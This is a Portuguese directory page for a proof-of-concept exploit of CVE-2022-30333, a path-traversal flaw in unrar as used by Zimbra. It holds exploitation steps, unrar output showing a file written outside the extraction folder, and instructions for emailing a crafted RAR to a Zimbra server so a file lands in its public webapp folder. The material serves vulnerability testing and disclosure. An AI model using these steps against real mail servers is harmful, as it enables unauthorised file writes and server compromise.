Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-30333-PoC — Exploração de prova de conceito para CVE-2022-30333, uma vulnerabilidade de traversal de caminho no unrar usado pelo Zimbra, demonstrando escrita arbitrária de arquivos por meio de arquivos RAR manipulados. | Kitploit
Ferramentas/GitHubGitHub/thel1ghtvn/cve-2022-30333-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubthel1ghtvn/cve-2022-30333-poc

CVE-2022-30333-PoC

Exploração de prova de conceito para CVE-2022-30333, uma vulnerabilidade de traversal de caminho no unrar usado pelo Zimbra, demonstrando escrita arbitrária de arquivos por meio de arquivos RAR manipulados.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
133há 4 anosAinda não revisado
Compartilhar

CVE-2022-30333-POC

Arquivo de exemplo para testar CVE-2022-30333

  • Sample.rar : se você quiser testar no Linux. Ao extrair, ele cria trav em ../../tmp/traversed. Certifique-se de que o diretório ../../tmp/traversed exista antes de extrair Sample.rar

  • exp.rar : se você quiser testar no servidor de e-mail Zimbra. Ao extrair, ele cria moo.txt em /opt/zimbra/jetty_base/webapps/zimbra/public/. Você pode acessar este arquivo em https://zimbra_mail_domain/public/moo.txt

ETAPAS DE EXPLORAÇÃO

Testando no Linux

mkdir ../../tmp/traversed (the destination folder must exsist before unrar)

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:44 trav

cat ../../tmp/traversed/trav
"traversed"

Testando no Zimbra

  • Crie um e-mail e anexe o arquivo rar malicioso e envie para o endereço de e-mail do Zimbra. Este arquivo rar será extraído durante a análise com o Amavisd.
  • O moo.txt deve estar em: /opt/zimbra/jetty_base/webapps/zimbra/public/moo.txt ou https://zimbra_mail_domain/public/moo.txt

REFERÊNCIAS

  1. Blog vietnamita da DEV2SEC
  2. Blog em inglês da Sonarsource
  3. Agradecimento especial a mrlihd por me ajudar a reconstruir a cadeia de ataque no Zimbra.
Baixar ferramenta